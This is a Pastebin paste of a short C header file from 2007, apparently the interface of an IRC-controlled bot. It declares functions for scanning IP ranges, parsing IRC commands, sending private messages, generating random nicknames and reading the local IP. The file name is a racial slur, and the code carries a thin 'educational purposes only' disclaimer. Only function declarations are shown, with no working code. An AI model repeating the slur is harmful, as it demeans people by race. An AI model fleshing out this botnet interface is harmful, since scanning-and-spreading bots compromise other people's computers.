Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- /*
- * niggerbot.h 2007 Ravo_5002
- * This code is for educational purposes only...
- */
- unsigned long rangescan(void *s);
- void ircparse(SOCKET ircconn, char ircline[4096]);
- unsigned long irc(void *s);
- void privmsg_irc(SOCKET ircconn, char *params);
- char *randnick(void);
- char *getlocalip(void);
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement